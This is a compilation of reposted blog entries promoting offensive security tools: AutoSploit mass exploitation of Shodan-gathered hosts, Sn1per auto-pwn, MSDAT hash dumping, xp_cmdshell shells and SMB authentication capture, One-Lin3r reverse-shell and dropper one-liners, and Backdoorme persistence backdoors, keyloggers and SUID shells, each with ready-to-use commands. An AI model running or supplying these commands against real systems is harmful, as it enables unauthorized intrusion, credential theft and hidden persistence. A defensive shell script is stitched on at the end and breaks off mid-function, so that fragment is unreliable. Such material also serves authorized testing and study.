AutoSploit v2.2 – Automated Mass Exploiter

As the name might suggest AutoSploit attempts to automate the exploitation of remote hosts. Targets can be collected automatically through Shodan, Censys or Zoomeye. But options to add your custom targets and host lists have been included as well. The available Metasploit modules have been selected to facilitate Remote Code Execution and to attempt to gain Reverse TCP Shells and/or Meterpreter sessions. Workspace, local host and local port for MSF facilitated back connections are configured by filling out the dialog that comes up before the exploit component is started.

Operational Security Consideration

Receiving back connections on your local machine might not be the best idea from an OPSEC standpoint. Instead consider running this tool from a VPS that has all the dependencies required, available.

The new version of AutoSploit has a feature that allows you to set a proxy before you connect and a custom user-agent.

Installation

Installing AutoSploit is very simple, you can find the latest stable release here.
You can also download the master branch as a zip or tarball or follow one of the below methods;

Cloning

    sudo -s << EOF
    git clone https://github.com/NullArray/Autosploit.git
    cd AutoSploit
    chmod +x install.sh
    ./install.sh
    python2 autosploit.py
    EOF

Docker

    sudo -s << EOF
    git clone https://github.com/NullArray/AutoSploit.git
    cd AutoSploit
    chmod +x install.sh
    ./install.sh
    cd AutoSploit/Docker
    docker network create -d bridge haknet
    docker run --network haknet --name msfdb -e POSTGRES_PASSWORD=s3cr3t -d postgres
    docker build -t autosploit .
    docker run -it --network haknet -p 80:80 -p 443:443 -p 4444:4444 autosploit
    EOF

On any Linux system the following should work;

    git clone https://github.com/NullArray/AutoSploit
    cd AutoSploit
    chmod +x install.sh
    ./install.sh

If you want to run AutoSploit on a macOS system, AutoSploit is compatible with macOS, however, you have to be inside a virtual environment for it to run successfully. To do this, do the following;

    sudo -s << '_EOF'
    pip2 install virtualenv --user
    git clone https://github.com/NullArray/AutoSploit.git
    virtualenv <PATH-TO-YOUR-ENV>
    source <PATH-TO-YOUR-ENV>/bin/activate
    cd <PATH-TO-AUTOSPLOIT>
    pip2 install -r requirements.txt
    chmod +x install.sh
    ./install.sh
    python autosploit.py
    _EOF

More information on running Docker can be found here.

Usage

Starting the program with python autosploit.py will open an AutoSploit terminal session. The options for which are as follows.

    1. Usage And Legal
    2. Gather Hosts
    3. Custom Hosts
    4. Add Single Host
    5. View Gathered Hosts
    6. Exploit Gathered Hosts
    99. Quit

Choosing option 2 will prompt you for a platform specific search query. Enter IIS or Apache in example and choose a search engine. After doing so the collected hosts will be saved to be used in the Exploit component.

As of version 2.0 AutoSploit can be started with a number of command line arguments/flags as well. Type python autosploit.py -h to display all the options available to you.
I've posted the options below as well for reference.

    usage: python autosploit.py -[c|z|s|a] -[q] QUERY [-C] WORKSPACE LHOST LPORT [-e] [--whitewash] PATH [--ruby-exec] [--msf-path] PATH [-E] EXPLOIT-FILE-PATH [--rand-agent] [--proxy] PROTO://IP:PORT [-P] AGENT

    optional arguments:
      -h, --help            show this help message and exit

    search engines:
      possible search engines to use
      -c, --censys          use censys.io as the search engine to gather hosts
      -z, --zoomeye         use zoomeye.org as the search engine to gather hosts
      -s, --shodan          use shodan.io as the search engine to gather hosts
      -a, --all             search all available search engines to gather hosts

    requests:
      arguments to edit your requests
      --proxy PROTO://IP:PORT
                            run behind a proxy while performing the searches
      --random-agent        use a random HTTP User-Agent header
      -P USER-AGENT, --personal-agent USER-AGENT
                            pass a personal User-Agent to use for HTTP requests
      -q QUERY, --query QUERY
                            pass your search query

    exploits:
      arguments to edit your exploits
      -E PATH, --exploit-file PATH
                            provide a text file to convert into JSON and save for later use
      -C WORKSPACE LHOST LPORT, --config WORKSPACE LHOST LPORT
                            set the configuration for MSF (IE -C default 127.0.0.1 8080)
      -e, --exploit         start exploiting the already gathered hosts

    misc arguments:
      arguments that don't fit anywhere else
      --ruby-exec           if you need to run the Ruby executable with MSF use this
      --msf-path MSF-PATH   pass the path to your framework if it is not in your ENV PATH
      --whitelist PATH      only exploit hosts listed in the whitelist file

Dependencies

Note: All dependencies should be installed using the above installation method, however, if you find they are not:

AutoSploit depends on the following Python2.7 modules.

    requests
    psutil

Should you find you do not have these installed get them with pip like so.

    pip install requests psutil

or

    pip install -r requirements.txt

Since the program invokes functionality from the Metasploit Framework you need to have this installed also. Get it from Rapid7 by clicking here.

Download AutoSploit v2.2

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZT_17-GzAcc/autosploit-v22-automated-mass-exploiter.html

UPDATED VERSION: RouterSploit 3.3.0

PenTestIT RSS Feed
Since my last update, this router exploitation framework has gone through a lot of updates. This post is about RouterSploit 3.3.0, code named I Know You Were Trouble. We will also discuss changes made to an earlier version, 3.2.0, to maintain a chain with the hopes that I keep a watch on these cool
Read more about UPDATED VERSION: RouterSploit 3.3.0
The post UPDATED VERSION: RouterSploit 3.3.0 appeared first on PenTestIT.

Link: http://pentestit.com/updated-version-routersploit-3-3-0/

UPDATED VERSION: AutoSploit 2.2

PenTestIT RSS Feed
It has been some days since there was a lot of hue and cry about AutoSploit and eventually everything subsided. I wrote about it in a post titled AutoSploit = Shodan/Censys/Zoomeye + Metasploit too. Recently an updated and improved version, AutoSploit 2.2, was released. This post will try to describe the changes between the
Read more about UPDATED VERSION: AutoSploit 2.2
The post UPDATED VERSION: AutoSploit 2.2 appeared first on PenTestIT.

Link: http://feedproxy.google.com/~r/PenTestIT/~3/1YYxIzm27jk/

Sn1per v5.0 – Automated Pentest Recon Scanner

Sn1per Community Edition is an automated scanner that can be used during a penetration test to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.

SN1PER PROFESSIONAL FEATURES:
- Professional reporting interface
- Slideshow for all gathered screenshots
- Searchable and sortable DNS, IP and open port database
- Categorized host reports
- Quick links to online recon tools and Google hacking queries
- Personalized notes field for each host

SN1PER COMMUNITY FEATURES:
- Automatically collects basic recon (ie. whois, ping, DNS, etc.)
- Automatically launches Google hacking queries against a target domain
- Automatically enumerates open ports via NMap port scanning
- Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers
- Automatically checks for sub-domain hijacking
- Automatically runs targeted NMap scripts against open ports
- Automatically runs targeted Metasploit scan and exploit modules
- Automatically scans all web applications for common vulnerabilities
- Automatically brute forces ALL open services
- Automatically tests for anonymous FTP access
- Automatically runs WPScan, Arachni and Nikto for all web services
- Automatically enumerates NFS shares
- Automatically tests for anonymous LDAP access
- Automatically enumerates SSL/TLS ciphers, protocols and vulnerabilities
- Automatically enumerates SNMP community strings, services and users
- Automatically lists SMB users and shares, checks for NULL sessions and exploits MS08-067
- Automatically exploits vulnerable JBoss, Java RMI and Tomcat servers
- Automatically tests for open X11 servers
- Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds
- Performs high level enumeration of multiple hosts and subnets
- Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting
- Automatically gathers screenshots of all web sites
- Create individual workspaces to store all scan output

AUTO-PWN:
- Drupal Drupalgeddon2 RCE CVE-2018-7600
- GPON Router RCE CVE-2018-10561
- Apache Struts 2 RCE CVE-2017-5638
- Apache Struts 2 RCE CVE-2017-9805
- Apache Jakarta RCE CVE-2017-5638
- Shellshock GNU Bash RCE CVE-2014-6271
- HeartBleed OpenSSL Detection CVE-2014-0160
- Default Apache Tomcat Creds CVE-2009-3843
- MS Windows SMB RCE MS08-067
- Webmin File Disclosure CVE-2006-3392
- Anonymous FTP Access
- PHPMyAdmin Backdoor RCE
- PHPMyAdmin Auth Bypass
- JBoss Java De-Serialization RCEs

KALI LINUX INSTALL:

    ./install.sh

DOCKER INSTALL:
Credits: @menzow
Docker Install: https://github.com/menzow/sn1per-docker
Docker Build: https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/

Example usage:

    $ docker pull menzo/sn1per-docker
    $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io

USAGE:

[*] NORMAL MODE
    sniper -t|--target <TARGET>

[*] NORMAL MODE + OSINT + RECON
    sniper -t|--target <TARGET> -o|--osint -re|--recon

[*] STEALTH MODE + OSINT + RECON
    sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon

[*] DISCOVER MODE
    sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORKSPACE_ALIAS>

[*] SCAN ONLY SPECIFIC PORT
    sniper -t|--target <TARGET> -m port -p|--port <portnum>

[*] FULLPORTONLY SCAN MODE
    sniper -t|--target <TARGET> -fp|--fullportonly

[*] PORT SCAN MODE
    sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>

[*] WEB MODE - PORT 80 + 443 ONLY!
    sniper -t|--target <TARGET> -m|--mode web

[*] HTTP WEB PORT MODE
    sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>

[*] HTTPS WEB PORT MODE
    sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>

[*] ENABLE BRUTEFORCE
    sniper -t|--target <TARGET> -b|--bruteforce

[*] AIRSTRIKE MODE
    sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike

[*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED
    sniper -f|--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>

[*] ENABLE LOOT IMPORTING INTO METASPLOIT
    sniper -t|--target <TARGET>

[*] LOOT REIMPORT FUNCTION
    sniper -w <WORKSPACE_ALIAS> --reimport

[*] UPDATE SNIPER
    sniper -u|--update

MODES:
- NORMAL: Performs basic scan of targets and open ports using both active and passive checks for optimal performance.
- STEALTH: Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.
- AIRSTRIKE: Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.
- NUKE: Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.
- DISCOVER: Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.
- PORT: Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.
- FULLPORTONLY: Performs a full detailed port scan and saves results to XML.
- WEB: Adds full automatic web application scans to the results (port 80/tcp & 443/tcp only). Ideal for web applications but may increase scan time significantly.
- WEBPORTHTTP: Launches a full HTTP web application scan against a specific host and port.
- WEBPORTHTTPS: Launches a full HTTPS web application scan against a specific host and port.
- UPDATE: Checks for updates and upgrades all components used by sniper.
- REIMPORT: Reimport all workspace files into Metasploit and reproduce all reports.
- RELOAD: Reload the master workspace report.

SAMPLE REPORT:
https://gist.github.com/1N3/8214ec2da2c91691bcbc

Download Sn1per v5.0

Link: http://feedproxy.google.com/~r/PentestTools/~3/Z_yHqaJ_y1U/sn1per-v50-automated-pentest-recon.html

Dumping Domain Password Hashes

It is very common during penetration tests where domain administrator access has been achieved to extract the password hashes of all the domain users for offline cracking and analysis. These hashes are stored in a database file in the domain controller (NTDS.DIT) with some additional information like group memberships and users. The NTDS.DIT file is […]

Link: https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/

MSDAT – Microsoft SQL Database Attacking Tool

MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.

Usage examples of MSDAT:
- You have a Microsoft database listening remotely and you want to find valid credentials in order to connect to the database
- You have a valid Microsoft SQL account on a database and you want to escalate your privileges
- You have a valid Microsoft SQL account and you want to execute commands on the operating system hosting this DB (xp_cmdshell)

Tested on Microsoft SQL database 2005, 2008 and 2012.

Changelog
- Version 1.0 (2017/02/15): first version released

Features

Thanks to MSDAT (Microsoft SQL Database Attacking Tool), you can:
- get technical information (ex: database version) of a MSSQL database without being authenticated
- search MSSQL accounts with a dictionary attack
- test each login as password (authentication required)
- get a windows shell on the database server with xp_cmdshell
- download files remotely with: OLE Automation, bulkinsert, openrowset
- upload files on the server with: OLE Automation, openrowset
- capture a SMB authentication thanks to: bulkinsert, openrowset, xp_dirtree, xp_fileexist, xp-getfiledetails
- steal MSSQL hashed passwords, on any MSSQL version
- scan ports through the database: openrowset
- execute SQL requests on a remote MSSQL server through the database (target) with: bulkinsert, openrowset
- list files/directories with: xp_subdirs, xp_dirtree
- list drives/medias with: xp_fixeddrives, xp_availablemedia
- create folder with: xp_create_subdir

Installation

Some dependencies must be installed in order to run MSDAT. In ubuntu:

    sudo apt-get install freetds-dev

or download freetds on http://www.freetds.org/

    sudo pip install cython colorlog termcolor pymssql argparse
    sudo pip install argcomplete && sudo activate-global-python-argcomplete

Add "use ntlmv2 = yes" in your freetds configuration file (ex: /etc/freetds/freetds.conf or /usr/local/etc/freetds.conf).
Example:

    [global]
        # TDS protocol version
        tds version = 8.0
        use ntlmv2 = yes

Examples

Modules

You can list all modules:

    ./msdat.py -h

When you have chosen a module (example: all), you can use it and you can list all features and options of the module:

    ./msdat.py all -h

You can know if a specific module can be used on a MSSQL server thanks to the --test-module option. This option is implemented in each msdat module.

all module

The all module allows you to run all modules (depends on the options that you have chosen).

    python msdat.py all -s $SERVER

If you want:
- to use your own account file for the dictionary attack
- to try multiple passwords for a user without asking you
- to define your own timeout value

    ./msdat.py all -s $SERVER -p $PORT --accounts-file accounts.txt --login-timeout 10 --force-retry

In each module, you can define the charset to use with the --charset option.

mssqlinfo module

To get technical information about a remote MSSQL server without being authenticated:

    ./msdat.py mssqlinfo -s $SERVER -p $PORT --get-max-info

This module uses the TDS protocol and the SQL Browser Server to get information.

passwordguesser module

This module allows you to search valid credentials:

    ./msdat.py passwordguesser -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --force-retry --search

The --force-retry option allows to test multiple passwords for each user without asking you.

You can specify your own account file with the --accounts-file option:

    ./msdat.py passwordguesser -s $SERVER -p $PORT --search --accounts-file accounts.txt --force-retry

passwordstealer module

To dump hashed passwords:

    ./msdat.py passwordstealer -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --dump --save-to-file test.txt

This module has been tested on SQL Server 2000, 2005, 2008 and 2014.

xpcmdshell module

To execute system commands thanks to xp_cmdshell (https://msdn.microsoft.com/en-us/library/ms190693.aspx):

    ./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --shell

This previous command gives you an interactive shell on the remote database server.

If xp_cmdshell is not enabled, the --enable-xpcmdshell option can be used in this module to activate it:

    ./msdat.py xpcmdshell -s $SERVER -p $PORT -U $USER -P $PASSWORD --enable-xpcmdshell --disable-xpcmdshell --shell

The --enable-xpcmdshell option enables xp_cmdshell if it is not enabled (not enabled by default). The --disable-xpcmdshell option disables xp_cmdshell if this one is enabled.

smbauthcapture module

Thanks to this module, you can capture a SMB authentication:

    ./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --capture $MY_IP_ADDRESS --share-name SHARE

To capture the SMB authentication, the auxiliary/server/capture/smb (http://www.rapid7.com/db/modules/auxiliary/server/capture/smb) module of metasploit could be used:

    msf > use auxiliary/server/capture/smb
    msf auxiliary(smb) > exploit

The capture command of this module tries to capture a SMB authentication thanks to the xp_dirtree, xp_fileexist or xp-getfiledetails procedure. If you want to choose the SMB authentication procedure to capture the authentication:

    ./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-dirtree-capture 127.0.0.1
    ./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-fileexist-capture 127.0.0.1
    ./msdat.py smbauthcapture -s $SERVER -p $PORT -U $USER -P $PASSWORD --xp-getfiledetails-capture 127.0.0.1

You can change the SHARE name with the --share-name option.

oleautomation module

This module can be used to read/write files on the database server.

The following command reads the file temp.txt stored on the database server:

    ./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'

To write a string in a file (temp.txt) remotely:

    ./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --write-file 'C:\Users\Administrator\Desktop\temp.txt' 'a\nb\nc\nd\ne\nf'

This module can be used to download a file (C:\Users\Administrator\Desktop\temp.txt) stored on the database server:

    ./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt

Also, you can use this module to upload a file (temp.txt) on the target:

    ./msdat.py oleautomation -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --put-file temp.txt 'C:\Users\Administrator\Desktop\temp.txt'

bulkopen module

The module bulkopen can be used:
- to read/download files stored on a database server
- to scan ports through the database server
- to execute SQL requests on a remote MSSQL server through the database

To read a file stored on the target, the following command can be used:

    ./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt'

The --method option can be used to specify the method to use: bulkinsert (https://msdn.microsoft.com/en-us/library/ms188365.aspx) or openrowset (https://msdn.microsoft.com/en-us/library/ms190312.aspx):

    ./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --read-file 'C:\Users\Administrator\Desktop\temp.txt' --method openrowset

To download a file (C:\Users\Administrator\Desktop\temp.txt):

    ./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --get-file 'C:\Users\Administrator\Desktop\temp.txt' temp.txt

This module can be used to scan ports (1433 and 1434 of 127.0.0.1) through the database server:

    ./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433,1434 -v

You can scan a range of ports:

    ./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --scan-ports 127.0.0.1 1433-1438

This module can be used to execute SQL requests (ex: select @@ServerName) on a remote database server (ex: $SERVER2) through the database ($SERVER):

    ./msdat.py bulkopen -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --request-rdb $SERVER2 $PORT $DATABASE $USER $PASSWORD 'select @@ServerName'

xpdirectory module

The module xpdirectory can be used:
- to list files, directories and drives
- to check if a file exists
- to create a directory

To list files in a specific directory:

    ./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-files 'C:\'

To list directories in a specific directory:

    ./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-dir 'C:\'

To list drives:

    ./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --list-fixed-drives --list-available-media

To check if a file exists:

    ./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --file-exists 'C:\' --file-exists 'file.txt'

To create a directory:

    ./msdat.py xpdirectory -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --create-dir 'C:\temp'

search module

The module search can be used to search a pattern in column names of tables and views. Useful to search the pattern %password% in column names, for example.

To get column names which contain password patterns (ex: passwd, password, motdepasse, clave):

    ./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns

If you want to see column names which don't contain any data, you should use the option --show-empty-columns.

To search a specific pattern in column names of views and tables:

    ./msdat.py search -s $SERVER -p $PORT -U $USER -P $PASSWORD -d $DATABASE --pwd-column-names --show-empty-columns

Download MSDAT

Link: http://feedproxy.google.com/~r/PentestTools/~3/ZIGtMzYR_7Q/msdat-microsoft-sql-database-attacking.html

One-Lin3r v1.1 – Gives You One-Liners That Aids In Penetration Testing Operations

One-Lin3r is a simple and light-weight framework inspired by the web-delivery module in Metasploit.

It consists of various one-liners that aid in penetration testing operations:
- Reverser: Give it IP & port and it returns a reverse shell liner ready for copy & paste.
- Dropper: Give it an uploaded-backdoor URL and it returns a download-&-execute liner ready for copy & paste.
- Other: Holds liners with the general purpose to help in penetration testing (ex: Mimikatz, Powerup, etc...) on the trending OSes (Windows, Linux, and macOS). "More OSes can be added too".

Features
- Search for any one-liner in the database by its full name or partially.
- You can add your own liners by following these steps to create a ".liner" file. Also, you can send it to me directly and it will be added in the framework and credited with your name.
- Autocomplete any framework command and recommendations in case of typos (in case you love hacking like movies).
- Command line arguments can be used to give the framework a resource file to load and execute for automation.
- The ability to reload the database if you added any liner without restarting the framework.
- You can add any platform to the payloads database just by making a folder in the payloads folder and creating a ".liner" file there.
- More...

The payloads database is not big now because this is the first edition but it will get bigger with updates and contributions.

Usage

Command line arguments

    usage: one-lin3r [-h] [-r R] [-x X] [-q]

    optional arguments:
      -h, --help  show this help message and exit
      -r          Execute a resource file (history file).
      -x          Execute a specific command (use ; for multiples).
      -q          Quit mode (no banner).

Framework commands

    Command          Description
    --------         -------------
    help/?           Show this help menu
    list/show        List payloads you can use in the attack.
    search           Search payloads for a specific one
    use <payload>    Use an available payload
    info <payload>   Get information about an available payload
    banner           Display banner
    reload/refresh   Reload the payloads database
    check            Prints the core version and database version then check for them online.
    history          Display command line most important history from the beginning
    save_history     Save command line history to a file
    exit/quit        Exit the framework

Installing and requirements

To make the tool work at its best you must have:
- Python 3.x or 2.x (preferred 3).
- Linux (tested on Kali rolling), Windows system, mac osx (tested on 10.11)
- The requirements mentioned in the next few lines.

Installing

For Windows (after downloading the ZIP and unzipping it):

    python -m pip install ./One-Lin3r-master
    one-lin3r -h

For Linux:

    git clone https://github.com/D4Vinci/One-Lin3r.git
    apt-get install libncurses5-dev
    pip install ./One-Lin3r
    one-lin3r -h

Updating the framework or the database

On Linux, while outside the directory:

    cd One-Lin3r && git pull && cd ..
    pip install ./One-Lin3r --upgrade

On Windows, if you don't have git installed, redownload the framework zipped!

Download One-Lin3r

Link: http://feedproxy.google.com/~r/PentestTools/~3/elxDfxPSrg8/one-lin3r-v11-gives-you-one-liners-that.html

Metateta – Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit

Metateta: Automated Tool For Scanning And Exploiting Network Protocols Using Metasploit, for faster pen testing of large networks.

What You Can Do
- Scanning with all Metasploit modules for a specific network protocol like smb, smtp, snmp
- Run all Auxiliary modules against a specific network protocol
- Run all possible Metasploit exploits for a specific network protocol. That is not recommended for real pen testing
- Can run against one target or network or even a text file with targets

Usage examples

    run.py -R 192.168.1.15-255 -p smb -x exploit
    run.py -r 192.168.1.15 -p smtp -x scan
    run.py -f hosts.txt -p smb -x auxiliary

Hossam Mohamed, @wazehell

Download Metateta

Link: http://feedproxy.google.com/~r/PentestTools/~3/JS2U_1rLV1I/metateta-automated-tool-for-scanning.html

Msploitego – Pentesting Suite For Maltego Based On Data In A Metasploit Database

msploitego leverages the data gathered in a Metasploit database by enumerating and creating specific entities for services. Services like samba, smtp, snmp, http have transforms to enumerate even further. Entities can either be loaded from a Metasploit XML file or taken directly from the Postgres msf database.

Requirements
- Python 2.7
- Has only been tested on Kali Linux
- Software installations: Metasploit, nmap, enum4linux, smtp-check, nikto

Installation
- Checkout and update the transform path inside Maltego
- In Maltego import config from msploitego/src/msploitego/resources/maltego/msploitego.mtz

General Use

Using an exported Metasploit xml file:
- Run a db_nmap scan in Metasploit, or import a previous scan

    msf> db_nmap -vvvv -T5 -A -sS -ST -Pn
    msf> db_import /path/to/your/nmapfile.xml

- Export the database to an xml file

    msf> db_export -f xml /path/to/your/output.xml

- In Maltego drag a MetasploitDBXML entity onto the graph.
- Update the entity with the path to your Metasploit database file.
- Run the MetasploitDB transform to enumerate hosts.
- From there several transforms are available to enumerate services and vulnerabilities stored in the Metasploit DB.

Using Postgres:
- Drag and drop a Postgresql DB entity onto the canvas, enter DB details.
- Run the Postgresql transforms directly against a running DB.

Notes

Instead of running a nikto scan directly from Maltego, I've opted to include a field for a Nikto XML file. Nikto can take a long time to run so it is best to manage that directly from the OS.

TODOs
- Connect directly to the postgres database (in progress)
- Much, much, much more transforms for actions on generated entities.

Download Msploitego

Link: http://feedproxy.google.com/~r/PentestTools/~3/NL3Bxk8kM2s/msploitego-pentesting-suite-for-maltego.html

Backdoorme – Powerful Auto-Backdooring Utility

Tools like metasploit are great for exploiting computers, but what happens after you've gained access to a computer? Backdoorme answers that question by unleashing a slew of backdoors to establish persistence over long periods of time. Once an SSH connection has been established with the target, Backdoorme's strengths can come to fruition. Unfortunately, Backdoorme is not a tool to gain root access, only to keep that access once it has been gained.

Please only use Backdoorme with explicit permission; please don't hack without asking.

Usage

Backdoorme is split into two parts: backdoors and modules.

Backdoors are small snippets of code which listen on a port and redirect to an interpreter, like bash. There are many backdoors written in various languages to give variety.

Modules make the backdoors more potent by running them more often, for example, every few minutes or whenever the computer boots. This helps to establish persistence.

Setup

To start backdoorme, first ensure that you have the required dependencies.

For Python 3.5+:

    $ sudo apt-get install python3 python3-pip python3-tk nmap
    $ cd backdoorme/
    $ virtualenv --python=python3.5 env
    $ source env/bin/activate
    (env) $ pip install -r requirements.txt

For Python 2.7:

    $ sudo python dependencies.py

Getting Started

Launching backdoorme:

    $ python master.py

To add a target:

    >> addtarget
    Target Hostname: 10.1.0.2
    Username: victim
    Password: password123
     + Target 1 Set!
    >>

Backdoors

To use a backdoor, simply run the "use" keyword.

    >> use shell/metasploit
     + Using current target 1.
     + Using Metasploit backdoor...
    (msf) >>

From there, you can set options pertinent to the backdoor. Run either "show options" or "help" to see a list of parameters that can be configured. To set an option, simply use the "set" keyword.

    (msf) >> show options
    Backdoor options:
    Option    Value    Description            Required
    ------    -----    -----------            --------
    name      initd    name of the backdoor   False
    ...
    (msf) >> set name apache
     + name => apache
    (msf) >> show options
    Backdoor options:
    Option    Value    Description            Required
    ------    -----    -----------            --------
    name      apache   name of the backdoor   False
    ...

As in metasploit, backdoors are organized by category.

Auxiliary
- keylogger: Adds a keylogger to the system and gives the option to email results back to you.
- simplehttp: installs python's SimpleHTTP server on the client.
- user: adds a new user to the target.
- web: installs an Apache Server on the client.

Escalation
- setuid: the SetUID backdoor works by setting the setuid bit on a binary while the user has root access, so that when that binary is later run by a user without root access, the binary is executed with root access. By default, this backdoor flips the setuid bit on nano, so that if root access is ever lost, the attacker can SSH back in as an unprivileged user and still be able to run nano (or any chosen binary) as root ('nano /etc/shadow'). Note that root access is initially required to deploy this escalation backdoor.
- shell: the shell backdoor is a privilege escalation backdoor, similar to (but more specific than) its SetUID escalation brother. It duplicates the bash shell to a hidden binary, and sets the SUID bit. Note that root access is initially required to deploy this escalation backdoor. To use, while SSHed in as an unprivileged user, simply run ".bash -p", and you will have root access.

Shell
- bash: uses a simple bash script to connect to a specific ip and port combination and pipe the output into bash.
- bash2: a slightly different (and more reliable) version of the above bash backdoor which does not prompt for the password on the client-side.
- sh: Similar to the first bash backdoor, but redirects input to /bin/sh.
- sh2: Similar to the second bash backdoor, but redirects input to /bin/sh.
- metasploit: employs msfvenom to create a reverse_tcp binary on the target, then runs the binary to connect to a meterpreter shell.
- java: creates a socket connection using libraries from Java and compiles the backdoor on the target.
- ruby: uses ruby's libraries to create a connection, then redirects to /bin/bash.
- netcat: uses netcat to pipe standard input and output to /bin/sh, giving the user an interactive shell.
- netcat_traditional: utilizes netcat-traditional's -e option to create a reverse shell.
- perl: a script written in perl which redirects output to bash, and renames the process to look less conspicuous.
- php: runs a php backdoor which sends output to bash. It does not automatically install a web server, but instead uses the web module.
- python: uses a short python script to perform commands and send output back to the user.
- web: ships a web server to the target, then uploads msfvenom's php reverse_tcp backdoor and connects to the host. Although this is also a php backdoor, it is not the same backdoor as the above php backdoor.

Access
- remove_ssh: removes the ssh server on the client. Often good to use at the end of a backdoorme session to remove all traces.
- ssh_key: creates an RSA key and copies it to the target for a passwordless ssh connection.
- ssh_port: Adds a new port for ssh.

Windows
- windows: Uses msfvenom to create a windows backdoor.

Modules

Every backdoor has the ability to have additional modules applied to it to make the backdoor more potent. To add a module, simply use the "add" keyword.

    (msf) >> add poison
     + Poison module added

Each module has additional parameters that can be customized, and if "help" is rerun, you can see or set any additional options.

    (msf) >> help
    ...
    Poison module options:
    Option      Value    Description                        Required
    ------      -----    -----------                        --------
    name        ls       name of command to poison          False
    location    /bin     where to put poisoned files into   False

Currently enabled modules include:
- Poison: Performs bin poisoning on the target computer. It compiles an executable to call a system utility and an existing backdoor. For example, if the bin poisoning module is triggered with "ls", it would compile and move a binary called "ls" that would run both an existing backdoor and the original "ls", thereby tricking a user into running an existing backdoor more frequently.
- Cron: Adds an existing backdoor to the root user's crontab to run with a given frequency.
- Web: Sets up a web server and places a web page which triggers the backdoor. Simply visit the site with your listener open and the backdoor will begin.
- User: Adds a new user to the target.
- Startup: Allows for backdoors to be spawned with the bashrc and init files.
- Whitelist: Whitelists an IP so that only that IP can connect to the backdoor.

Targets

Backdoorme supports multiple different targets concurrently, organized by number when entered. The core maintains one "current" target, to which any new backdoors will default. To switch targets manually, simply add the target number after the command: "use metasploit 2" will prepare the metasploit backdoor against the second target. Run "list" to see the list of current targets, whether a connection is open or closed, and what backdoors & modules are available.

Download Backdoorme
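The setuid and shell escalation backdoors described above both leave a setuid-root file on disk, and the shell variant is specifically a hidden copy of bash with the SUID bit set. The script below is an added defender-side example, not part of Backdoorme or its documentation: it walks a directory tree for setuid regular files whose contents are byte-for-byte identical to a known shell binary, which is the artefact such a backdoor leaves behind. The list of shell paths, the function names, and the constructed sample tree used for the demo are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not Backdoorme's code): audit a tree for setuid copies of shells.

# Shells whose setuid copies are suspicious. Assumption: at least /bin/sh exists.
KNOWN_SHELLS="/bin/sh /bin/bash /bin/dash /bin/zsh"

# Print the sha256 of each known shell that is present on this host, one per line.
known_shell_hashes() {
    for s in $KNOWN_SHELLS; do
        [ -f "$s" ] && sha256sum "$s" | cut -d' ' -f1
    done
    return 0
}

# find_suid_shell_copies DIR
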